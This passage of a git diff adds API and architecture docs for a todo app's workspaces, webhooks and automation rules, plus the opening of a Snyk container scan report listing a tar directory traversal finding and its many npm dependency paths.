`todo.updated`, `todo.deleted`, `workspace.updated`, `member.added`). +- `secret`: if omitted, a random secret is generated (returned only at creation; store it). + +**Response:** `201` + `{ id, url, events, active, createdAt }`. Secret is not returned in list/get. + +--- + +### List webhooks + +`GET /api/workspaces/:workspaceId/webhooks` + +**Response:** `{ webhooks: [ { id, url, events, active, createdAt, lastFailure } ] }`. + +--- + +### Delete webhook + +`DELETE /api/workspaces/:workspaceId/webhooks/:id` + +**Response:** `204`. + +--- + +### Webhook delivery + +Outgoing POST body: + +```json +{ + "event": "todo.created", + "resourceType": "todo", + "resourceId": "...", + "workspaceId": "...", + "data": { ... }, + "timestamp": "2025-02-20T12:00:00.000Z" +} +``` + +Header: `X-Webhook-Signature: sha256=` (HMAC-SHA256 of the raw JSON body using the webhook secret). Timeout 15s; retries up to 3 with backoff. Payload capped at 100kb. + +--- + +## Automation rules + +Owner or admin only. Max 50 rules per workspace; max 5 actions per rule. + +### Create rule + +`POST /api/workspaces/:workspaceId/rules` + +**Body:** + +```json +{ + "name": "High priority reminder", + "enabled": true, + "trigger": "todo.created", + "schedule": "0 9 * * *", + "conditions": [ + { "field": "priority", "op": "eq", "value": "high" }, + { "field": "tags", "op": "contains", "value": "urgent" }, + { "field": "due_date", "op": "before", "value": "2025-12-31" } + ], + "actions": [ + { "type": "send_webhook", "url": "https://example.com/notify", "secret": "optional" }, + { "type": "update_todos", "updates": { "priority": "high" } } + ] +} +``` + +- **trigger:** `schedule` | `todo.created` | `todo.updated`. For `schedule`, `schedule` must be a valid cron expression (e.g. `0 9 * * *` = 9am daily). +- **conditions:** array of `{ field, op, value }`. Supported: `eq`, `neq`, `in`, `contains` (for tags), `before`/`after` (for due_date). +- **actions:** `send_webhook` (POST to URL with context) or `update_todos` (bulk update todos matching conditions, limit 100). + +**Response:** `201` + rule object. + +--- + +### List rules + +`GET /api/workspaces/:workspaceId/rules` + +**Response:** `{ rules: [ ... ] }`. + +--- + +### Get one rule + +`GET /api/workspaces/:workspaceId/rules/:id` + +--- + +### Update rule + +`PATCH /api/workspaces/:workspaceId/rules/:id` + +**Body:** Any of `name`, `enabled`, `schedule`, `conditions`, `actions`. + +--- + +### Delete rule + +`DELETE /api/workspaces/:workspaceId/rules/:id` + +**Response:** `204`. + +--- + +## Error responses + +- `400`: Validation failed; body includes `error` and optionally `details` (express-validator format). +- `401`: Authentication required. +- `403`: Forbidden (e.g. not a member, or insufficient role). +- `404`: Resource not found. +- `409`: Conflict (e.g. slug already exists, user already member). diff --git a/docs/ARCHITECTURE-WORKSPACES.md b/docs/ARCHITECTURE-WORKSPACES.md new file mode 100644 index 00000000000..fb7a0639961 --- /dev/null +++ b/docs/ARCHITECTURE-WORKSPACES.md @@ -0,0 +1,42 @@ +# Architecture: Workspaces, Audit, Webhooks, and Rules + +## Overview + +The Todo Workspace & Automation layer adds multi-tenant workspaces, an audit log, outbound webhooks, and an automation rule engine. Events flow from API mutations → audit → webhooks and into the rule engine. + +## Workspaces + +- **Workspace**: name, URL-safe `slug`, settings (JSON). One workspace can have many members and many todos. +- **WorkspaceMember**: links a user (by string id/email) to a workspace with a role: `owner`, `admin`, `member`, or `viewer`. +- **Todo**: optional `workspace` (ObjectId). Todos without a workspace remain global/default for backward compatibility. +- **Auth**: “Current user” is taken from the `X-User-Id` header or from the session. All workspace and todo endpoints enforce membership/role where needed. + +## Audit + +- **AuditEvent**: workspace, actor (user id), action (e.g. `todo.created`, `workspace.updated`, `member.added`), resourceType (todo | workspace | member), resourceId, details (JSON), ip, createdAt. +- Each mutation (todo CRUD, workspace update, member add/remove) creates an audit event via `services/audit.js`. The audit API exposes a paginated, filterable list per workspace. +- Optional retention: `scripts/audit-retention.js [days]` deletes events older than the given days (default 90). + +## Webhooks + +- **Webhook**: workspace, url, secret (for HMAC), events (array of event names), active flag. +- On each audited event (or a defined subset), the app enqueues a delivery in an **in-memory queue** in `services/webhook-delivery.js`. +- A **worker** (same process, triggered when the queue is drained) POSTs to the webhook URL with a JSON body and `X-Webhook-Signature: sha256=`. Timeout 15s; payload capped at 100kb. Retries up to 3 times with backoff. Last failure is stored on the Webhook document (and optionally in WebhookDelivery for history). + +## Rules (automation) + +- **Rule**: workspace, name, enabled, trigger (`schedule` | `todo.created` | `todo.updated`), schedule (cron expression), conditions (JSON array), actions (JSON array). +- **Condition evaluator** (in `services/rule-engine.js`): given a todo or context, evaluates conditions (field eq/neq/in, due_date before/after, tags contains). +- **Action executor**: `send_webhook` — POST to a URL with context; `update_todos` — bulk update todos matching the same conditions (with a limit, e.g. 100). +- **Execution:** + - On `todo.created` / `todo.updated`, the workspace-todos route calls the rule engine to find rules with that trigger, evaluate conditions, and run actions (fire-and-forget). + - **Cron:** `node-cron` runs every minute. For each rule with `trigger: schedule`, the engine checks whether the rule’s cron expression fires in the current minute; if so, it runs conditions against todos and executes actions. + +## Event flow (summary) + +1. **API** (e.g. create/update/delete todo, update workspace, add/remove member) runs in route handlers. +2. **Audit**: Route handlers (or shared helpers) call `audit.createEvent(...)` after the mutation. +3. **Webhooks**: The same code path (or a post-audit hook) calls `webhookDelivery.notifyWebhooks(workspaceId, event, payload)`, which enqueues deliveries for active webhooks subscribed to that event. +4. **Rules**: For todo create/update, the route calls `ruleEngine.runRulesForTodo(workspaceId, trigger, todo, cb)`. For schedule triggers, the cron job in the rule engine runs every minute and executes matching rules. + +All new REST handlers live under `routes/` (workspaces.js, workspace-todos.js, audit.js, webhooks.js, rules.js), and business logic is in `services/` (audit.js, webhook-delivery.js, rule-engine.js, workspace-auth.js). diff --git a/docs/container-report-test.html b/docs/container-report-test.html new file mode 100644 index 00000000000..be8ce6bdb24 --- /dev/null +++ b/docs/container-report-test.html @@ -0,0 +1,35256 @@ + + + + + + + + + Snyk test report + + + + + + + + + +
+
+
+
+ + + Snyk - Open Source Security + + + + + + + +
+

Snyk test report

+ +

February 20th 2026, 5:47:06 am (UTC+00:00)

+
+
+ Scanned the following paths: +
    +
  • node:18-alpine (apk)
    • +
  • node:18-alpine//usr/local/lib/node_modules (npm)
    • +
+
+ +
+
25 known vulnerabilities
+
1523 vulnerable dependency paths
+
205 dependencies
+
+
+
+
+ +
+
+
+

Directory Traversal

+
+ +
+
+ high severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + tar +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmaccess@8.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmhook@10.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmorg@6.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmsearch@7.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmteam@6.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-profile@10.0.0 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
